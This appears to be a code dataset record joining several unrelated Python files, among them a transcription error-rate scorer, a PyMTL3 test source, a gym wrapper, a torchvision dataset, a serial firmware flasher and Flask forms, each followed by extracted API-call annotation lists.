        # hyp.append(get_unicode_code(transcription))
    elif input_source == '-':
        line_n = 0
        for line in sys.stdin:
            line_n += 1
            line = line.rstrip('\n').rstrip('\r').decode(encoding)
            fields = line.split(separator)
            # Malformed lines are skipped with a warning, not fatal.
            if len(fields) != 2:
                logging.warning(
                    'Line %d has %d fields but 2 were expected',
                    line_n, len(fields))
                continue
            ref.append(fields[0])
            hyp.append(fields[1])
    elif input_source == 'file':
        ref = load_file(reference, encoding)
        hyp = load_file(transcription, encoding)
        # The two files must be parallel: one hypothesis per reference.
        if len(ref) != len(hyp):
            logging.error(
                'The number of reference and transcription sentences does not '
                'match (%d vs. %d)', len(ref), len(hyp))
            exit(1)
    else:
        logging.error('INPUT FROM "%s" NOT IMPLEMENTED', input_source)
        exit(1)
    # Accumulators: (substitutions, insertions, deletions, totals).
    wer_s, wer_i, wer_d, wer_n = 0, 0, 0, 0
    cer_s, cer_i, cer_d, cer_n = 0, 0, 0, 0
    sen_err = 0
    for n in range(len(ref)):
        # update CER statistics: edit distance over characters
        _, (s, i, d) = levenshtein(ref[n], hyp[n])
        cer_s += s
        cer_i += i
        cer_d += d
        cer_n += len(ref[n])
        # update WER statistics: edit distance over whitespace tokens
        _, (s, i, d) = levenshtein(ref[n].split(), hyp[n].split())
        wer_s += s
        wer_i += i
        wer_d += d
        wer_n += len(ref[n].split())
        # update SER statistics: a sentence is wrong if any word edit occurred
        if s + i + d > 0:
            sen_err += 1
    # Rates are only printed if at least one reference character was seen.
    if cer_n > 0:
        print('CER: %g%%, WER: %g%%, SER: %g%%' % (
            (100.0 * (cer_s + cer_i + cer_d)) / cer_n,
            (100.0 * (wer_s + wer_i + wer_d)) / wer_n,
            (100.0 * sen_err) / len(ref)))
|
[
"logging.error",
"logging.basicConfig"
] |
[((155, 241), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(levelname)s(%(filename)s:%(lineno)d): %(message)s"""'}), "(format=\n '%(levelname)s(%(filename)s:%(lineno)d): %(message)s')\n", (174, 241), False, 'import logging\n'), ((3152, 3213), 'logging.error', 'logging.error', (['"""Expected reference and transcription sources"""'], {}), "('Expected reference and transcription sources')\n", (3165, 3213), False, 'import logging\n'), ((1494, 1541), 'logging.error', 'logging.error', (['"""Error reading file "%s\\""""', 'fname'], {}), '(\'Error reading file "%s"\', fname)\n', (1507, 1541), False, 'import logging\n'), ((4292, 4354), 'logging.error', 'logging.error', (['"""INPUT FROM "%s" NOT IMPLEMENTED"""', 'input_source'], {}), '(\'INPUT FROM "%s" NOT IMPLEMENTED\', input_source)\n', (4305, 4354), False, 'import logging\n')]
|
"""
========================================================================
Test sources
========================================================================
Test sources with CL or RTL interfaces.
Author : <NAME>
Date : Mar 11, 2019
"""
from collections import deque
from pymtl3 import *
from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL
#-------------------------------------------------------------------------
# TestSrcCL
#-------------------------------------------------------------------------
class TestSrcCL( Component ):
  """Cycle-level test source.

  Pops messages from `msgs` and pushes them out through the `send`
  caller interface, waiting `initial_delay` cycles before the first
  message and `interval_delay` cycles between messages.
  """
  def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ):
    s.send = CallerIfcCL( Type=Type )
    s.msgs = deque( msgs )
    # Cycles remaining before the next send; primed with the initial delay.
    s.count = initial_delay
    s.delay = interval_delay
    @update_once
    def up_src_send():
      if s.count > 0:
        s.count -= 1
      elif not s.reset:
        # Send only when the receiver is ready and messages remain.
        if s.send.rdy() and s.msgs:
          s.send( s.msgs.popleft() )
          s.count = s.delay # reset count after a message is sent
  def done( s ):
    # The source is done once every message has been sent.
    return not s.msgs
  # Line trace
  def line_trace( s ):
    return "{}".format( s.send )
#-------------------------------------------------------------------------
# TestSrcRTL
#-------------------------------------------------------------------------
# TODO: deprecating TestSrcRTL.
class TestSrcRTL( Component ):
  """RTL test source.

  Wraps TestSrcCL with a CL-to-RTL adapter so messages come out of an
  RTL `send` interface instead of a CL caller interface.
  """
  def construct( s, Type, msgs, initial_delay=0, interval_delay=0 ):
    # Interface
    s.send = SendIfcRTL( Type )
    # Components
    s.src = TestSrcCL( Type, msgs, initial_delay, interval_delay )
    s.adapter = RecvCL2SendRTL( Type )
    connect( s.src.send, s.adapter.recv )
    connect( s.adapter.send, s.send )
  def done( s ):
    # Delegate completion to the wrapped CL source.
    return s.src.done()
  # Line trace
  def line_trace( s ):
    return "{}".format( s.send )
|
[
"pymtl3.stdlib.ifcs.RecvCL2SendRTL",
"pymtl3.stdlib.ifcs.SendIfcRTL",
"collections.deque"
] |
[((672, 683), 'collections.deque', 'deque', (['msgs'], {}), '(msgs)\n', (677, 683), False, 'from collections import deque\n'), ((1435, 1451), 'pymtl3.stdlib.ifcs.SendIfcRTL', 'SendIfcRTL', (['Type'], {}), '(Type)\n', (1445, 1451), False, 'from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL\n'), ((1560, 1580), 'pymtl3.stdlib.ifcs.RecvCL2SendRTL', 'RecvCL2SendRTL', (['Type'], {}), '(Type)\n', (1574, 1580), False, 'from pymtl3.stdlib.ifcs import RecvCL2SendRTL, SendIfcRTL\n')]
|
import gym
from typing import List, Tuple, Dict
import numpy as np
from gym import spaces
from core.simulation import Simulation
from service import global_constants
class JsbsimGymEnvironmentWrapper(gym.Env):
    """Gym environment wrapping a JSBSim flight-dynamics Simulation.

    Action: a single normalised throttle command in [0, 1].
    Observation: the raw simulation state vector (unbounded floats).

    Note: both reset() and step() return the 4-tuple
    (observation, rewards, dones, info) -- callers rely on this shape,
    so it is kept even though classic gym resets return only obs.
    """
    metadata = {'render.modes': ['human']}

    def __init__(self, configuration_path: str = global_constants.DEFAULT_CONFIGURATION_PATH):
        super().__init__()
        self.sim = Simulation(configuration_path=configuration_path)
        self._dimensions = 1
        # Throttle command, normalised to [0, 1].
        self.action_space = spaces.Box(
            low=0,
            high=1,
            shape=(self._dimensions,),
            dtype=np.float32
        )
        # Bug fix: the lower bound used to be +np.inf, which describes a
        # degenerate interval; the observation is unbounded in both
        # directions.
        self.observation_space = spaces.Box(
            low=-np.inf,
            high=np.inf,
            shape=self._getObs().shape,  # adapts automatically to the observation size
            dtype=np.float32
        )

    def reset(self):
        """Reset the simulation to its initial condition."""
        self.sim.reset_with_initial_condition()
        return self._getObs(), self._calcRewards(), self._calcDones(), {}

    def step(self, actions: List[np.ndarray]) -> Tuple[np.ndarray, np.ndarray, np.ndarray, Dict]:
        """Apply the throttle command and advance the simulation one step."""
        self.sim.set_properties('fcs/throttle-cmd-norm', actions[0])
        self.sim.run()
        return self._getObs(), self._calcRewards(), self._calcDones(), {}

    def _getObs(self) -> np.ndarray:
        # Flatten the simulation's state dict into a plain value vector.
        state = self.sim.get_state()
        return np.array(list(state.values()))

    def _calcRewards(self) -> np.ndarray:
        # Placeholder reward: always 0 for the single agent.
        rewAgent0 = 0
        return np.array([rewAgent0], dtype=np.float32)

    def _calcDones(self) -> np.ndarray:
        # Placeholder termination flags: the episode never terminates.
        dones = np.zeros(1)
        return dones

    def render(self, mode='human'):
        # Rendering is not implemented.
        pass

    def close(self):
        pass

    def seed(self, seed=None) -> None:
        # Nothing to seed; the underlying simulation handles its own state.
        pass
if __name__ == "__main__":
    # Smoke test: build the environment, reset it, then repeatedly step
    # with one sampled action and print the transition tuples.
    demo_env = JsbsimGymEnvironmentWrapper()
    _initial = demo_env.reset()
    sampled_action = demo_env.action_space.sample()
    for _step in range(10):
        print(demo_env.step(sampled_action))
|
[
"numpy.zeros",
"numpy.array",
"gym.spaces.Box",
"core.simulation.Simulation"
] |
[((482, 531), 'core.simulation.Simulation', 'Simulation', ([], {'configuration_path': 'configuration_path'}), '(configuration_path=configuration_path)\n', (492, 531), False, 'from core.simulation import Simulation\n'), ((589, 660), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(-0)', 'high': '(1)', 'shape': '(self._dimensions,)', 'dtype': 'np.float32'}), '(low=-0, high=1, shape=(self._dimensions,), dtype=np.float32)\n', (599, 660), False, 'from gym import spaces\n'), ((1556, 1595), 'numpy.array', 'np.array', (['[rewAgent0]'], {'dtype': 'np.float32'}), '([rewAgent0], dtype=np.float32)\n', (1564, 1595), True, 'import numpy as np\n'), ((1653, 1664), 'numpy.zeros', 'np.zeros', (['(1)'], {}), '(1)\n', (1661, 1664), True, 'import numpy as np\n')]
|
import functools
import io
from typing import Any, Callable, Dict, List, Optional, Tuple
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
CSVParser,
)
from torchvision.prototype.datasets.decoder import raw
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
HttpResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling
from torchvision.prototype.features import Image, Label
class SEMEION(Dataset):
    """Semeion handwritten-digit dataset (16x16 images, 10 digit classes)."""

    def _make_info(self) -> DatasetInfo:
        # RAW type: samples are decoded manually from the space-separated rows.
        return DatasetInfo(
            "semeion",
            type=DatasetType.RAW,
            categories=10,
            homepage="https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit",
        )

    def resources(self, config: DatasetConfig) -> List[OnlineResource]:
        archive = HttpResource(
            "http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data",
            sha256="f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1",
        )
        return [archive]

    def _collate_and_decode_sample(
        self,
        data: Tuple[str, ...],
        *,
        decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
    ) -> Dict[str, Any]:
        # Each row: 256 pixel columns followed by a one-hot label vector.
        pixels = [float(value) for value in data[:256]]
        image_data = torch.tensor(pixels, dtype=torch.uint8).reshape(16, 16)
        one_hot = [int(value) for value in data[256:] if value]

        if decoder is raw:
            image = Image(image_data.unsqueeze(0))
        else:
            image_buffer = image_buffer_from_array(image_data.numpy())
            image = decoder(image_buffer) if decoder else image_buffer  # type: ignore[assignment]

        # Index of the first set entry in the one-hot label vector.
        label_idx = next(idx for idx, flag in enumerate(one_hot) if flag)
        return dict(image=image, label=Label(label_idx, category=self.info.categories[label_idx]))

    def _make_datapipe(
        self,
        resource_dps: List[IterDataPipe],
        *,
        config: DatasetConfig,
        decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
    ) -> IterDataPipe[Dict[str, Any]]:
        datapipe = resource_dps[0]
        datapipe = CSVParser(datapipe, delimiter=" ")
        datapipe = hint_sharding(datapipe)
        datapipe = hint_shuffling(datapipe)
        return Mapper(datapipe, functools.partial(self._collate_and_decode_sample, decoder=decoder))
|
[
"functools.partial",
"torchvision.prototype.datasets.utils.HttpResource",
"torchvision.prototype.datasets.utils._internal.hint_shuffling",
"torchdata.datapipes.iter.CSVParser",
"torchvision.prototype.datasets.utils.DatasetInfo",
"torchvision.prototype.datasets.utils._internal.hint_sharding",
"torchvision.prototype.features.Label"
] |
[((653, 795), 'torchvision.prototype.datasets.utils.DatasetInfo', 'DatasetInfo', (['"""semeion"""'], {'type': 'DatasetType.RAW', 'categories': '(10)', 'homepage': '"""https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit"""'}), "('semeion', type=DatasetType.RAW, categories=10, homepage=\n 'https://archive.ics.uci.edu/ml/datasets/Semeion+Handwritten+Digit')\n", (664, 795), False, 'from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource, DatasetType\n'), ((938, 1121), 'torchvision.prototype.datasets.utils.HttpResource', 'HttpResource', (['"""http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data"""'], {'sha256': '"""f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1"""'}), "(\n 'http://archive.ics.uci.edu/ml/machine-learning-databases/semeion/semeion.data'\n , sha256='f43228ae3da5ea6a3c95069d53450b86166770e3b719dcc333182128fe08d4b1'\n )\n", (950, 1121), False, 'from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource, DatasetType\n'), ((2250, 2278), 'torchdata.datapipes.iter.CSVParser', 'CSVParser', (['dp'], {'delimiter': '""" """'}), "(dp, delimiter=' ')\n", (2259, 2278), False, 'from torchdata.datapipes.iter import IterDataPipe, Mapper, CSVParser\n'), ((2292, 2309), 'torchvision.prototype.datasets.utils._internal.hint_sharding', 'hint_sharding', (['dp'], {}), '(dp)\n', (2305, 2309), False, 'from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling\n'), ((2323, 2341), 'torchvision.prototype.datasets.utils._internal.hint_shuffling', 'hint_shuffling', (['dp'], {}), '(dp)\n', (2337, 2341), False, 'from torchvision.prototype.datasets.utils._internal import image_buffer_from_array, hint_sharding, hint_shuffling\n'), ((2366, 2433), 'functools.partial', 'functools.partial', (['self._collate_and_decode_sample'], {'decoder': 'decoder'}), 
'(self._collate_and_decode_sample, decoder=decoder)\n', (2383, 2433), False, 'import functools\n'), ((1922, 1980), 'torchvision.prototype.features.Label', 'Label', (['label_idx'], {'category': 'self.info.categories[label_idx]'}), '(label_idx, category=self.info.categories[label_idx])\n', (1927, 1980), False, 'from torchvision.prototype.features import Image, Label\n')]
|
import pegtree as pg
from pegtree import ParseTree
from pegtree.visitor import ParseTreeVisitor
import tree as ntree
import pprint
# Grammar and parser are built once at import time and shared module-wide.
peg = pg.grammar('multiese.pegtree')
parser = pg.generate(peg)
def fix(tree):
    """Recursively repair ``epos_`` so every node's end position covers
    all of its positional and keyed children, and return the tree."""
    end_positions = [tree.epos_]
    for child in tree:
        fix(child)
        end_positions.append(child.epos_)
    for key in tree.keys():
        end_positions.append(fix(tree.get(key)).epos_)
    tree.epos_ = max(end_positions)
    return tree
class MultieseParser(ParseTreeVisitor):
    """Converts a Multiese parse tree into ``tree`` (ntree) nodes."""

    def __init__(self):
        ParseTreeVisitor.__init__(self)

    def parse(self, s: str):
        """Parse source string *s* and return the converted node."""
        return self.visit(parser(s))

    def acceptChunk(self, tree: ParseTree):
        chunk = ntree.parse(str(tree))
        return ntree.系列(*chunk.flatten()).simplify()

    def acceptSeq(self, tree: ParseTree):
        flattened = []
        for child in tree:
            self.visit(child).flatten(flattened)
        return ntree.系列(*flattened)

    def acceptBlock(self, tree: ParseTree):
        # A bracketed sub-expression, e.g. (1+2)*3, becomes a group node.
        return ntree.グループ(self.visit(tree[0]))

    def acceptChoice(self, tree: ParseTree):
        alternatives = [self.visit(child) for child in tree]
        node = ntree.Choice(alternatives)
        if alternatives[0].__class__.__name__ != '助詞':
            ntree.update_choice_dic(node.stringfy())  # refresh the synonym dictionary
        return node

    def acceptExpression(self, tree: ParseTree):
        return ntree.コード(str(fix(tree)))

    def acceptSymbol(self, tree: ParseTree):
        return ntree.コード(str(fix(tree)))

    def acceptAnnotation(self, tree: ParseTree):
        kind = str(tree[0])  # annotation type name
        operands = [self.visit(child) for child in tree[1:]]
        return ntree.annotation(kind, operands)
# Module-level singleton shared by the helper functions below.
mult = MultieseParser()
def multiese_parser(s: str):
    """Parse *s* with the shared MultieseParser instance."""
    return mult.parse(s)
def test_for_nobu(s):
    """Debug helper: print the sentence, its parsed repr, and a blank line."""
    print(s)
    parsed = mult.parse(s)
    print('=>', repr(parsed))
    print()
if __name__ == '__main__':
    # Ad-hoc demo sentences (Japanese phrases mixing code annotations).
    demo_sentences = [
        'データフレームdfを降順にソートする',
        '望遠鏡で泳ぐ子犬を見た',
        '望遠鏡で{泳ぐ子犬}を見た',
        '望遠鏡で[子犬|とうきび]を見た',
        '@type(df, データフレーム)について、望遠鏡で子犬を見てない',  # negation case
        '@type(df)の先頭を見る',  # keyword case
        '望遠鏡で{子犬が泳ぐ}様子を見たら、math.pi+1を実行する',
    ]
    for sentence in demo_sentences:
        test_for_nobu(sentence)
|
[
"tree.Choice",
"tree.annotation",
"pegtree.visitor.ParseTreeVisitor.__init__",
"tree.parse",
"pegtree.grammar",
"tree.系列",
"pegtree.generate",
"tree.コード"
] |
[((138, 168), 'pegtree.grammar', 'pg.grammar', (['"""multiese.pegtree"""'], {}), "('multiese.pegtree')\n", (148, 168), True, 'import pegtree as pg\n'), ((178, 194), 'pegtree.generate', 'pg.generate', (['peg'], {}), '(peg)\n', (189, 194), True, 'import pegtree as pg\n'), ((478, 509), 'pegtree.visitor.ParseTreeVisitor.__init__', 'ParseTreeVisitor.__init__', (['self'], {}), '(self)\n', (503, 509), False, 'from pegtree.visitor import ParseTreeVisitor\n'), ((699, 713), 'tree.parse', 'ntree.parse', (['s'], {}), '(s)\n', (710, 713), True, 'import tree as ntree\n'), ((953, 966), 'tree.系列', 'ntree.系列', (['*ns'], {}), '(*ns)\n', (961, 966), True, 'import tree as ntree\n'), ((1232, 1248), 'tree.Choice', 'ntree.Choice', (['ns'], {}), '(ns)\n', (1244, 1248), True, 'import tree as ntree\n'), ((1473, 1485), 'tree.コード', 'ntree.コード', (['s'], {}), '(s)\n', (1482, 1485), True, 'import tree as ntree\n'), ((1574, 1586), 'tree.コード', 'ntree.コード', (['s'], {}), '(s)\n', (1583, 1586), True, 'import tree as ntree\n'), ((1740, 1766), 'tree.annotation', 'ntree.annotation', (['name', 'ns'], {}), '(name, ns)\n', (1756, 1766), True, 'import tree as ntree\n')]
|
# _ _ _
# / \ _ __ __| (_)_ __ ___ _ __ _ _
# / _ \ | '_ \ / _` | | '_ \ / _ \| '_ \| | | |
# / ___ \| | | | (_| | | | | | (_) | |_) | |_| |
# /_/ \_\_| |_|\__,_|_|_| |_|\___/| .__/ \__, |
# |_| |___/
# by <NAME>
import time
import serial
import sys
import os
e = bytearray([0xFF, 0xFF, 0xFF])
def get_baud_rate(dev_port: serial.Serial, diagnostics: bool = False):
    """Probe the Nextion display on *dev_port* to discover its baud rate.

    Tries each supported rate, sending the 'connect' command framed by
    0xFF terminators, and returns the first rate at which the display
    answers with a 'comok' response; returns False if none works.
    When *diagnostics* is True, progress and device info are printed.
    """
    def diag_print(text: str):
        # Print only when diagnostics were requested.
        if diagnostics:
            print(text)
    for baud_rate in (2400, 4800, 9600, 19200, 38400, 57600, 115200, 921600, 512000, 256000, 250000, 230400):
        dev_port.baudrate = baud_rate
        # Timeout scales inversely with the baud rate so slow rates get more time.
        dev_port.timeout = 3000 / baud_rate + 0.2
        diag_print(f"trying with {baud_rate} baud")
        dev_port.write(e)
        dev_port.write("connect".encode('ascii'))
        dev_port.write(e)
        # Drop the trailing three 0xFF terminator bytes from the reply.
        r = dev_port.read(128)[:-3]
        if 'comok' in str(r):
            diag_print(f"Connected with {baud_rate} baud")
            # NOTE(review): r is a bytes object, so str(r) yields its repr
            # ("b'comok ...'"); the strip('\xff')/split parsing below operates
            # on that repr -- confirm the extracted fields are as intended.
            status, unknown1, model, firmware, mcucode, nextion_serial, nextion_flash_size = str(r).strip("\xff").split(
                ',')
            if status.split(' ')[1] == "1":
                diag_print('Touchscreen: enabled')
            else:
                diag_print('Touchscreen: disabled')
            diag_print(
                f"Model:{model}\nFirmware:{firmware}\nMCU-Code:{mcucode}\nSerial:{nextion_serial}\nFlashSize:{nextion_flash_size}")
            return baud_rate
    return False
def force_max_baud(dev_port, filesize, diagnostics=False):
    """Negotiate the fastest upload baud rate the display accepts.

    Sends the 'whmi-wri <filesize>,<baud>,0' upload command at each rate
    from fastest to slowest, switches the local port to that rate, and
    waits for the 0x05 acknowledge byte.  Returns True on success and
    False if no rate is acknowledged.
    """
    def diag_print(text: str):
        # Print only when diagnostics were requested.
        if diagnostics:
            print(text)
    for baud in [921600, 512000, 256000, 250000, 230400, 115200, 57600, 38400, 31250, 19200, 9600]:
        diag_print(f"Trying {baud} baud")
        diag_print(f"SENDING: whmi-wri {filesize},{baud},0")
        dev_port.write(f"whmi-wri {filesize},{baud},0".encode("ascii"))
        dev_port.write(e)
        # Give the display time to switch before changing our own rate.
        time.sleep(0.4)
        dev_port.baudrate = baud
        dev_port.timeout = 0.5
        time.sleep(.1)
        r = dev_port.read(1)
        # 0x05 is the Nextion acknowledge byte.
        if 0x05 in r:
            return True
    return False
def upload_image(dev_port, filename, filesize):
    """Stream the TFT firmware file to the display in 4096-byte chunks.

    After each chunk the display must answer with a 0x05 acknowledge
    byte; returns False on the first missing acknowledge and True when
    the whole file was accepted.  Upload progress is printed to stdout.
    """
    with open(filename, 'rb') as image:
        data_count = 0
        while 1:
            data = image.read(4096)
            if len(data) < 1:
                # End of file reached.
                break
            data_count += len(data)
            dev_port.timeout = 5
            dev_port.write(data)
            sys.stdout.write('\rUpload, %3.1f%%...' % (data_count / float(filesize) * 100.0))
            sys.stdout.flush()
            time.sleep(.5)
            r = dev_port.read(1)
            if 0x05 not in r:
                # Display did not acknowledge the chunk -- abort.
                return False
    return True
def flash(port: str, tft_file: str):
    """Flash *tft_file* onto the Nextion display attached to serial *port*.

    Opens the port, auto-detects the current baud rate, negotiates the
    fastest upload rate and streams the file; exits the process with
    status 1 on any failure.
    """
    port = serial.Serial(port, 9600, timeout=None)
    if not port.isOpen():
        port.open()
    if not get_baud_rate(port, diagnostics=True):
        print("Baud Rate could not be specified")
        exit(1)
    file_size = os.path.getsize(tft_file)
    if not force_max_baud(port, file_size, diagnostics=True):
        print("Could not force baud rate")
        exit(1)
    if not upload_image(port, tft_file, file_size):
        print("could not upload tft File")
        exit(1)
if __name__ == "__main__":
    if len(sys.argv) != 2:
        # Bug fix: previously execution fell through after printing the
        # usage text and crashed with an IndexError on sys.argv[1].
        print('usage:\npython3 nextion_util.py file_to_upload.tft')
        exit(1)
    file = sys.argv[1]
    flash("/dev/ttyAMA0", file)
    exit(0)
|
[
"serial.Serial",
"os.path.getsize",
"sys.stdout.flush",
"time.sleep"
] |
[((2793, 2832), 'serial.Serial', 'serial.Serial', (['port', '(9600)'], {'timeout': 'None'}), '(port, 9600, timeout=None)\n', (2806, 2832), False, 'import serial\n'), ((3011, 3036), 'os.path.getsize', 'os.path.getsize', (['tft_file'], {}), '(tft_file)\n', (3026, 3036), False, 'import os\n'), ((1968, 1983), 'time.sleep', 'time.sleep', (['(0.4)'], {}), '(0.4)\n', (1978, 1983), False, 'import time\n'), ((2056, 2071), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2066, 2071), False, 'import time\n'), ((2589, 2607), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2605, 2607), False, 'import sys\n'), ((2620, 2635), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (2630, 2635), False, 'import time\n')]
|
#
# Copyright 2015 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
from strabo.connection import StraboConnection
from strabo.location import Location, LocationSet
import unittest
import os
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
class UploadTest(unittest.TestCase):
    """Integration tests: upload two CSV location sets and run
    nearest-neighbour queries against the strabo service.

    NOTE(review): assertEquals/assertItemsEqual are the Python-2 unittest
    spellings (assertEqual/assertCountEqual in Python 3) -- this module
    appears to target Python 2.
    """
    def test_simple_upload(self):
        # Nearest neighbour of (2, 20) within the first uploaded set.
        response = Location(2, 20).nearest_neighbors(self.set1, 1).run()
        self.assertEquals(response, {'result': [{'lat': 0.11, 'lon': 10.22}]})
    def test_location_set_map(self):
        # Map every location in set1 to its nearest neighbour in set2.
        response = self.set1.map(lambda x: x.nearest_neighbor(self.set2)).run()
        self.assertTrue('result' in response)
        self.assertItemsEqual(response['result'], [{'lat': 31.0, 'lon': -120.01},
                                                   {'lat': -2.0, 'lon': 8.0}])
    def setUp(self):
        # Upload both CSV fixtures before each test.
        self.set1 = LocationSet(filename =
            os.path.join(TEST_DIR, 'testdata', 'upload_locations_test.csv'),
            id_column = 'id',
            lat_column = 'lat',
            lon_column = 'lon')
        self.set2 = LocationSet(filename =
            os.path.join(TEST_DIR, 'testdata', 'second_test_location_set.csv'),
            id_column = 'point_id',
            lat_column = 'latitude',
            lon_column = 'longitude')
    def tearDown(self):
        # Delete the uploaded rows; counts must match the fixture sizes (2 and 3).
        self.assertEquals(self.set1.clear().run(), {'result': {"num_rows_affected": 2}})
        self.assertEquals(self.set2.clear().run(), {'result': {"num_rows_affected": 3}})
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
[
"unittest.main",
"os.path.realpath",
"strabo.location.Location",
"os.path.join"
] |
[((815, 841), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (831, 841), False, 'import os\n'), ((2225, 2240), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2238, 2240), False, 'import unittest\n'), ((1473, 1536), 'os.path.join', 'os.path.join', (['TEST_DIR', '"""testdata"""', '"""upload_locations_test.csv"""'], {}), "(TEST_DIR, 'testdata', 'upload_locations_test.csv')\n", (1485, 1536), False, 'import os\n'), ((1751, 1817), 'os.path.join', 'os.path.join', (['TEST_DIR', '"""testdata"""', '"""second_test_location_set.csv"""'], {}), "(TEST_DIR, 'testdata', 'second_test_location_set.csv')\n", (1763, 1817), False, 'import os\n'), ((934, 949), 'strabo.location.Location', 'Location', (['(2)', '(20)'], {}), '(2, 20)\n', (942, 949), False, 'from strabo.location import Location, LocationSet\n')]
|
#!/usr/bin/env python3
# coding=UTF-8
import os
import sys
import shutil
import ConfigParser
from logger import *
def generate_workspace(config, info):
    """Create a per-problem contest workspace under the current directory.

    Layout: ``<cwd>/<contest_id><problem_id>/`` containing an optional
    solution template (when *config* is given), a ``sample/`` directory
    with ``<n>.in``/``<n>.out`` files for every test sample, and a
    ``config.ini`` project file.

    config -- global ConfigParser with a [wtf_cf] section, or a falsy
              value when no global configuration exists.
    info   -- dict with at least 'contest_id', 'problem_id' and
              'test_samples' (a list of {'input': ..., 'output': ...}).
    """
    # The shebang says Python 3 but the top-level import uses the Python-2
    # module name ConfigParser; this shim keeps the function working on both.
    try:
        import configparser as _configparser  # Python 3
    except ImportError:
        import ConfigParser as _configparser  # Python 2
    cwd = os.path.abspath(os.getcwd())
    ws_dir = cwd + '/' + info['contest_id'] + info['problem_id']
    sample_dir = ws_dir + '/sample'
    if os.path.isdir(ws_dir):
        fatal('Directory {} already exists, exit.'.format(os.path.basename(ws_dir)))
    os.mkdir(ws_dir)
    if config:
        # Copy the solution template into the workspace.
        template_file = os.path.expandvars(config.get('wtf_cf', 'template_file'))
        shutil.copy(template_file, ws_dir + '/solution.' + config.get('wtf_cf', 'template_suffix'))
    os.mkdir(sample_dir)
    for (index, sample) in enumerate(info['test_samples']):
        with open(sample_dir + '/' + str(index) + '.in', 'w') as in_file:
            in_file.write(sample['input'])
        with open(sample_dir + '/' + str(index) + '.out', 'w') as out_file:
            out_file.write(sample['output'])
    # Copy so the caller's dict is not mutated (the original clobbered
    # info['test_samples'] in place).
    conf = dict(info)
    conf['samples'] = len(info['test_samples'])
    conf['test_samples'] = None
    conf['compile_command'] = config.get('wtf_cf', 'compile_command') if config else 'echo "There\'s no global config file." && exit -1'
    config_file = _configparser.ConfigParser()
    config_file.add_section('project')
    for (key, value) in conf.items():
        if value:
            # Python 3's ConfigParser.set() requires string values; str()
            # matches what Python 2 wrote to the file anyway.
            config_file.set('project', key, str(value))
    config_file.set('project', 'solution', 'solution.' + (config.get('wtf_cf', 'template_suffix') if config else 'cxx'))
    with open(ws_dir + '/config.ini', 'w') as file:
        config_file.write(file)
|
[
"os.mkdir",
"os.path.basename",
"os.path.isdir",
"os.getcwd",
"ConfigParser.ConfigParser"
] |
[((309, 330), 'os.path.isdir', 'os.path.isdir', (['ws_dir'], {}), '(ws_dir)\n', (322, 330), False, 'import os\n'), ((416, 432), 'os.mkdir', 'os.mkdir', (['ws_dir'], {}), '(ws_dir)\n', (424, 432), False, 'import os\n'), ((636, 656), 'os.mkdir', 'os.mkdir', (['sample_dir'], {}), '(sample_dir)\n', (644, 656), False, 'import os\n'), ((1210, 1237), 'ConfigParser.ConfigParser', 'ConfigParser.ConfigParser', ([], {}), '()\n', (1235, 1237), False, 'import ConfigParser\n'), ((183, 194), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (192, 194), False, 'import os\n'), ((384, 408), 'os.path.basename', 'os.path.basename', (['ws_dir'], {}), '(ws_dir)\n', (400, 408), False, 'import os\n')]
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, EqualTo, Email
# Form for address
class AddressForm(FlaskForm):
    """Form collecting a single required address string."""
    # Required free-text address.
    address = StringField('Address',validators=[DataRequired()])
    submit = SubmitField('Submit')
# Form for email notifications
class EmailForm(FlaskForm):
    """Sign-up form for e-mail notifications."""
    # NOTE(review): the '<NAME>' label looks like a redacted placeholder
    # (probably 'Full Name') -- confirm before shipping.
    fullName = StringField('<NAME>',validators=[DataRequired()])
    # Must be present and a syntactically valid e-mail address.
    email = StringField('Email', validators=[DataRequired(), Email()])
    address = StringField('Address',validators=[DataRequired()])
    submit = SubmitField('Sign Up')
|
[
"wtforms.SubmitField",
"wtforms.validators.DataRequired",
"wtforms.validators.Email"
] |
